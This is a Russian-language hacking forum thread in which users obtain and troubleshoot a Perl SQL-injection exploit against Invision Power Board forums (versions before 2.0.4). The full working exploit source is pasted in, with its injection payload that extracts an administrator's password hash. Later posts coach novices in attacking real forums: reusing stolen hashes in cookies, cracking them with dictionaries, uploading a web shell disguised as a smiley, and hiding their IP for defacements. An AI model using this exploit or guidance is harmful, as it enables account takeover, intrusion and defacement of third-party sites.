Где сплоийт взял ?


У кого есть поделлитесь

gagarin_y_vas_Lubila_o@rambler.ru

смотри на www.securitylab.ru в разделе РОС.

Все нашел .

C:\>Perl\bin\perl.exe C:\ipd.pl
Can't locate IO/Socket.pm in @INC (@INC contains: c:/perl/lib/perl5 c:/perl/lib/
perl5/site c:/perl/lib/perl5/site .) at C:\ipd.pl line 37.
BEGIN failed--compilation aborted at C:\ipd.pl line 37.


Это что ?

Это что ?


А вот это для кого написали?


Can't locate IO/Socket.pm

А вот это для кого написали?


Я англиский плохо знаю , я всю жизнь француский учил .

Все все ...
понял

Почему у меня он пасс в виде звездочек выдает ******************

Почему у меня он пасс в виде звездочек выдает ******************
потому, что каменты на секюритилабе читать надо

Спасибо

ОК !

Гы я даже сначало не ксплойт качал а пошел почитал и уже потом скачал а ты сразу давай юзать им ...... блин вот я только расшифровывать устал =((

правь сорсы

где? здесь?

#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr(42);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%7 2%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072 %3B%26%231073%3B%26%231086%3B%26%231090%3B%26%2310 72%3B%26%231077%3B%26%231090%3B%21";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3,$nmalykh);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}

во блин люди обленились! :mad:
да загляни на предыдущую страницу, там всё уже написано.

Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\НЕО>cd\

C:\>Perl\bin\perl.exe C:\ipb.pl http://domain.com /forum/ 1 0
[~] SERVER : domain.com
[~] PATH : /forum/
[~] MEMBER ID : 1
[~] TARGET : 0 - IPB 1.*
[~] SEARCHING PASSWORD ... [ FAILED ]

но почему FAILED, почему!!! :( не могу больше, что надо делать???

Не смеши я в видео всё показал.
1.Может версия 2.0.4
2.Может и даже до 2.0.4 ты просто последнию цифру поставь 0 (для версии 1*) 1 (для версии до 2.0.4)
3.Вот и думай!

я жалкий ламер! =((
помогите я нифига не понимаю, установил Перл, но я нифига не понимаю про ipb.pl что это такое и где его брать??? =((

я жалкий ламер! =((
помогите я нифига не понимаю, установил Перл, но я нифига не понимаю про ipb.pl что это такое и где его брать??? =((
Брать тут http://rst.void.ru/download/r57ipb2.txt
Потом создаёшь текстовой документ и копируешь всё это туда и сохраняешь с расширением .pl
Удачи.....

Тока про звёздочки не спрашивай=^ ^=

А где перл взять киньте ссылку

http://forum.antichat.ru/thread7042.html

C:\Documents and Settings\Arthas>cd\

объясните пожалуйста что это означает: cd\

ps почему античат не ставит бан таким людям....
ззы "cd \" комманда смена каталога на корневой...
зззы и для кого хелпы пишут...

пуск>выполнить>cmd>help

все узнаеш

ps почему античат не ставит бан таким людям....
ззы "cd \" комманда смена каталога на корневой...
зззы и для кого хелпы пишут...
те, которые хотят научить что то не имеют право высказываться?

пуск>выполнить>cmd>help

все узнаеш
большое спасибо

у меня еще один вопрос, когда хотим расшифровать хещ пользователя Ipb форума, тогда обязательно надо указать тип хеща Md5, или как?

P.s. прошу прощения, если мой вопрос очень глупый

ps почему античат не ставит бан таким людям....
ззы "cd \" комманда смена каталога на корневой...
зззы и для кого хелпы пишут...
я тоже такого мнения , и согласен :mad: надо банить

у меня еще один вопрос, когда хотим расшифровать хещ пользователя Ipb форума, тогда обязательно надо указать тип хеща Md5, или как?

P.s. прошу прощения, если мой вопрос очень глупый
ну зачем же сразу мд5.. укажи мускул хеш или хеш ворда =)))
ответ: да, нужно указать как тип хеша мд5....

На www.securitylab.ru на форуме читай там всё написано!

Люди, я конечно чайник полный, но подскажите, в чём причина того, что когда я пытаюсь с помощью эксплоита узнать хеш у меня в командной строке пишеться вот это:
can't locate object method "get" via package "LWP: :UserAgent" <perhaps you forgot to load "LWP: :UserAgent"?> at C:ibp.pl line 45
Прошу не ругать английский знаю плохо, попробовал перевести только больше запутался.

пуск>выполнить>cmd>help


Да ты че, он под QNX сидит...

Все решил свою проблему и со звездочками то же....
Но вот вопрос Id пользователя- это по порядку регистрации или в каком порядке стоят админы. Поясняю: У меня есть Админ в колонке админов он стоит вторым, а зарегился на форуме пятым, какой мне Id ставить- 2 или 5?

Если ты свой пасс ищешь то ставь 5, если админа то ....
При просмотре профиля админа смотришь в адресную строку ..............showuser=(Id админа).

вот еще вопрос, на видио пароль по хешу нашелся меньше чём за секунду, а у меня PasswordPro пишет что будет искать 4 дня, даже если выбрать только числовые пароли в радиусе от 4 до 12 знаков. Это нормально?

Абсолютно нормально. А с чего ты взял что у тебя числовой пароль? Поставь лучше a-z, 0-9, до шести знаков. Может повезёт.

Словари вначале попробуй.
Там один админ? Просто если их несколько больше шанс,что у кого то из них простой пароль.

Привет,у меня PasswordPro,я туда забил словарей на 12 мегов,и он больше есть их не хочет,а когда пробую расшифровать хеш,он пробивает всего пару слов и говорит всё!
У меня голимый проц,так что это решение не для меня.
Подставляю куки и id админа,не х неполучается,в чём может быть проблема?

Подставляю куки и id админа,не х неполучается,в чём может быть проблема?
В кривых руках. Неправельно чтото делаешь.

Да врятли,посмотри видео (щас нет времени отснимать,в этом видео странный[короткий] хеш),но так же делал с нормальным хешем,и тоже самое...Блин чё не так?!!
http://moder-pro.narod.ru/1.rar

S@cred Хэш MD5 состоит из 32 символов. Других вариантов нет.
2. 12 мегов? Считаешь что это много? Объедини их в один файл, в PassPro можно загнать 32 файла словарей.
12 мегов перебираются очень быстро. Если ты в левом нижнем углу увидел только два паса - ничего не значит. Всё перебралось.

S@cred Хэш MD5 состоит из 32 символов. Других вариантов нет.
2. 12 мегов? Считаешь что это много? Объедини их в один файл, в PassPro можно загнать 32 файла словарей.
12 мегов перебираются очень быстро. Если ты в левом нижнем углу увидел только два паса - ничего не значит. Всё перебралось.
Спасиб,но насчёт длины хеша могу с тобой поспорить.Бубу пробовать............Смотри:
1)куки до изменения -
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

forum.antichat.ru FALSE / FALSE 1155360416 abblastvisit 1123824465
forum.antichat.ru FALSE / FALSE 1155360442 abbpassword 764a85ea3ebe0dd55020bc8d8f6c71ff
forum.antichat.ru FALSE / FALSE 1155360442 abbuserid 18039
forum.antichat.ru FALSE / FALSE 1155360442 abblastactivity 1123824465
.list.ru TRUE / FALSE 1131566347 VID 1XF3fc3FUtGB
.google.ru TRUE / FALSE 2147368397 PREF ID=c1afd5989dd10636:LD=ru:TM=1123824451:LM=1123824 451:S=r1G5wlx8QPUoAdTk
.hicomm.bg TRUE / FALSE 1155360173 pass_hash 6bed538cc57d0b447cb78dd40d63d0f2
.hicomm.bg TRUE / FALSE 1155360173 member_id 419


После:
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

forum.antichat.ru FALSE / FALSE 1155360416 abblastvisit 1123824465
forum.antichat.ru FALSE / FALSE 1155360442 abbpassword 764a85ea3ebe0dd55020bc8d8f6c71ff
forum.antichat.ru FALSE / FALSE 1155360442 abbuserid 18039
forum.antichat.ru FALSE / FALSE 1155360442 abblastactivity 1123824465
.list.ru TRUE / FALSE 1131566347 VID 1XF3fc3FUtGB
.google.ru TRUE / FALSE 2147368397 PREF ID=c1afd5989dd10636:LD=ru:TM=1123824451:LM=1123824 451:S=r1G5wlx8QPUoAdTk
.hicomm.bg TRUE / FALSE 1155360173 pass_hash 566a0969794807df57dfa65da92bfd4c
.hicomm.bg TRUE / FALSE 1155360173 member_id 2

НЕ х неполучается.

Есть ещё session id, почему-то я его не вижу. Его надо удалить. Юзать для этого лучше всё кроме IE.
Насчёт длинны md5 спорить не надо. Лучше что-нибудь почитай про это.

Кстати, какой ты хэш получил? С солью, или без?

Azazel,всё ок,просто тоже самоё сделал в осле.

Видео супер всё сделал получил жэш расшифровал получил пароль. Есть вопрос я понял как всё делать с shell'ом но собственно зачем он нужен ? Какие у него функции ?
И ещё подскажите пожалуйста как скрыть свой ip ?
Я пробовал программами Steganos Internet Privasy ip конечно скрывает но работать в интернете не возможно страници открывает с 5 раза и то пол часа. Пробовал Socks Cap с этой штукой вообще ни одна страница не открылась хотя Socks proxy вроде свежие были.

как всё делать с shell'ом


С каким шеллом? Шелл заливается через иконки...

Выбираешь
Загрузитть смайлик,но вместо смайлика грузиш шелл.

Кстати у меня в админку через прокси не пускал!!! Почему?

С каким шеллом? Шелл заливается через иконки...
Это я понял. Но что такое shell ? Какие функции он выполняет ?

Shell (перевод с англ.- оболочка)
Функции-выполнение произвольных комманд.

Shell (перевод с англ.- оболочка)
Функции-выполнение произвольных комманд.
Ага понял. Почитаю ещё статьи об этом.
Скажи как можно скрыть свой ip без сильных тормозов. А то я пробовал разными программами так в интернете сидеть вообще невозможно страницы не открываются, или открываються но очень долго.

Выбирай прокси получше. А чтоб без тормозов - используй платный.

Выбирай прокси получше. А чтоб без тормозов - используй платный.
Где взять прокси получше ? Чтобы хотя бы как нибудь дефейс можно было сделать.

Где взять получше? Пробовать первый, второй и т.д. Между прочим разницы нету, что ты просто через прокси гуляешь, что дефейс делаешь.
http://www.checker.freeproxy.ru/checker/last_checked_proxies.php
Меня эти устраивают.

Где взять получше? Пробовать первый, второй и т.д. Между прочим разницы нету, что ты просто через прокси гуляешь, что дефейс делаешь.
http://www.checker.freeproxy.ru/checker/last_checked_proxies.php
Меня эти устраивают.
Спасибо за ссылку сейчас попробую. А какой программой посоветуешь пользоваться ?

Ага понял. Почитаю ещё статьи об этом.
Скажи как можно скрыть свой ip без сильных тормозов. А то я пробовал разными программами так в интернете сидеть вообще невозможно страницы не открываются, или открываються но очень долго.Используй VPN.Эстественно он платный =(
зы Новички,учитесь задавать вопросы и получать ответы на них,яркий пример: NIGHT_WOLF мало знает,зато и объеснять ему приятно,а не тем кто тупо пишет:
помогите взломать http://link/

Спасибо за ссылку сейчас попробую. А какой программой посоветуешь пользоваться ?Это уже на твое усмотрение.По идее большинство прог мало чем отличаются друг от дружки.

Это уже на твое усмотрение.По идее большинство прог мало чем отличаются друг от дружки.
Понятное дело, задача то одна скрыть ip.
Поставил себе Socks Cap V2 беру Free SOCKS 5 proxy с сайта написанного выше, открываю любую страницу жду секунд 30 а он мне пишет: "Connection to SOCKS server refused or timed out." Пробую так же с другими прокси этого же и других сайтов в итоге такая же тема.
Запускаю Steganos Internet Privacy убираю галочку напротив Changing Camouflage addresses (насколько я понял эта опция меняет proxy server через заданное кол-во секунд) всё работает конечно медленно но терпимо. Единственная проблема сразу отключилась icq почему ?

==>"Connection to SOCKS server refused or timed out."
Бывает такая фигня с первого раза. Но со второго-третьго пробивает и дальше идёт нормально. Вот это Socks5 (200.21.116.50) у меня сейчас работает.

==>"Connection to SOCKS server refused or timed out."
Бывает такая фигня с первого раза. Но со второго-третьго пробивает и дальше идёт нормально. Вот это Socks5 (200.21.116.50) у меня сейчас работает.
Что то у меня не то, даже с 5 раза пробивать не хочет.

ХЗ. У меня канал широкий.
Что-то мы тут разоффтопились. Если что - пиши в личку.

Хорошо вот вопрос по теме.
Я расшифровываю хэш программой PasswordsPro такой же как и на видео. Какова примерная скорость расшифровки ? А то я уже часов 6-7 пытаюсь один хэш расшифровать и никак не получаеться.

Можно никогда не расшифровать... или лет через несколько.
версия форума 1.*.*?

Можно никогда не расшифровать... или лет через несколько.
версия форума 1.*.*?
Да первая версия.
В настройках перебора какие лучше значения ставить ? Чтобы выше был процент того что хэш расшифруется.

100% расшифруется,если все символы установить. Но это может занять годы. Буквально.
Для начала своруй куки всех админов форума,загони из все в прогу и попробуй атаку по словарю. Где то на форуме были ссылки на очень неплохие коллекции.(Искать некогда). У меня всегда хоть 1 пароль да находился по словарю.
Короче как повезёт.
------------------------------------------------------
ВОПРОС касательно rainbowcrack(простите,что здесь),что такое

t rainbow chain length, see the paper for detail
m rainbow chain count of each rainbow table, see the paper for detail
l rainbow table count, see the paper for detail :eek:

Не нашёл нигде нормальной инфы,что это такое.
Какие значения лучьше ставить?
А то в синтаксисе командной строки путаюсь :confused:

Vandal привет!
У меня такая же ошибка:
C:\>Perl\bin\perl.exe C:\ipd.pl
Can't locate IO/Socket.pm in @INC (@INC contains: c:/perl/lib/perl5 c:/perl/lib/
perl5/site c:/perl/lib/perl5/site .) at C:\ipd.pl line 37.
BEGIN failed--compilation aborted at C:\ipd.pl line 37.

Что делать, чтобы её устранить???

У меня такая ошибка была когда я пытался пользоваться перлом из набора Денвер. Я просто поставил стандартный перл последней версии скачаный с официального сайта и всё нормально заработало.

А с какого сайта качал perl?

дай ссылу на скачку Perl'а плиз.

Всё спасибо - скачал new Perl 5.8.7 всё пашет на ура!

Люди вот у меня вот такая лажа все делаю как будто бы правильно но после надписи
SEARCHING PASSWORD ...
поевляется вот что Can't use an undefined value as a symbol reference at C:\r57ipb2.pl line 134.
Очень прошу подскажите что это такое и как это устранить
Зарание спасибо

Это означает, что ты используешь старый сплойт. Форум пропатчен.

Azazel
А новый есть если есть скажите где его можно скачать

На http://www.securitylab.ru/. Но если админ этого форума по таким сайтам тоже шляется, то и те что новее не пойдут.

Нубский вопрос:

юзаю умный эксплоит Coyl'а, я везучийпоэтому всегда подбирается лёгкий пас, до соли не доходит. Лёгкий пас получается всегда такого вида: ххххххххххххххххххххххххх ххххххххххххххххххххххххх х, х - только цифры. А как декодить этот "простой" пароль?

Мда... в этом сплоите SIMPLE PASSWORD HASH выдаётся в идиотском виде кодов (alt+ x)
Ясное дело что "аффтар" сплоита и видео это знал....

Coyl, нах мучать нубов? =)